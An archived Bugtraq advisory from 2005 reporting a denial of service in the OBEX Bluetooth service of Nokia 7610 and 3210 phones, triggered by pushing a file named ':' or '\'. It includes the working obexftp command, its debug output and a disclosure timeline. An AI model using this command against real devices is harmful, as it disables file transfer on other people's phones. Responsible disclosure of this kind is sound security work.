[40484] in bugtraq

home help back first fref pref prev next nref lref last post

Nokia 7610, 3210 denial of service in OBEX.

daemon@ATHENA.MIT.EDU (A. Ramos)
Tue Sep 27 15:43:52 2005

Date: Mon, 26 Sep 2005 19:58:53 +0200
From: "A. Ramos" <aramosf@unsec.net>
To: aramosf@unsec.net
Cc: bugtraq@securityfocus.com, vuldb@securityfocus.com
Message-Id: <20050926195827.FD75.ARAMOSF@unsec.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="===[PGP/MIME_RFC2015]===433836C3.2A4C==="; protocol="application/pgp-signature"; micalg="pgp-SHA1"
Content-Transfer-Encoding: 7bit

--===[PGP/MIME_RFC2015]===433836C3.2A4C===
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable

Title: Nokia 7610, 3210 Denial of Service in OBEX.
Severity: Low
Affected: tested in nokia 7610 and nokia 3210 (maybe others symbian
phones).
Problem type: remote

Details:
---------------------------------------------------------------------------=
-------------------------------

They are some flaw in the OBEX implementation in nokia 7610 (V4.0.437
15-09-04 RH51), and others, that disable this service if you send
archive with name ":" or "\".=20

----
 Quote of IROBEX12.pdf  Pag:40, section 4.3 -- (OBEX specification)

"Pushing objects into the inbox Objects are pushed into the inbox by using=
=20
the PUT command with a Name header. The string in the Name header=20
should not contain any path characters such as =91:=92, =91/=92 or =91\=92.=
 Objects with
improperly formed names should be rejected."
----

The device ask for PIN if you are not paired or ask if you want accept a
connection of the remote box, you need ACCEPT. It have low risk ,
becouse dont work if you dont accept the incoming connection.

If connection is established, the file is sended and they arent "New
message arrived" message, like when you send correct archive. Its ok,
the  filename is dropped.

The problem is the OBEX service dont work anymore after this, if you
tried to send other file or from some vcard from other device, you cant
connect to the remote OBEX service again.

Demostration with Linux as client:


jim:~# hcitool scan
Scanning ...
	00:13:70:5E:1F:01	7610


jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput =3D 31
obexftp_sync() Done success=3D1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod =3D 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput =3D 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing other file after send ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
---------------------------------------------------------------------------=
-------------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.


--
A. Ramos.
mailto: <aramosf@unsec.net>
http://www.unsec.net=20

--===[PGP/MIME_RFC2015]===433836C3.2A4C===
Content-Type: application/pgp-signature
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32)

iD8DBQBDODbA5Sm7/VQ1lUgRAhHZAJ0WUbq8R27u0NUxSwcK9yOptArTvQCgt8gv
oXBb3pet4eAASq4vJLCU6M0=
=A5VA
-----END PGP SIGNATURE-----

--===[PGP/MIME_RFC2015]===433836C3.2A4C===--


home help back first fref pref prev next nref lref last post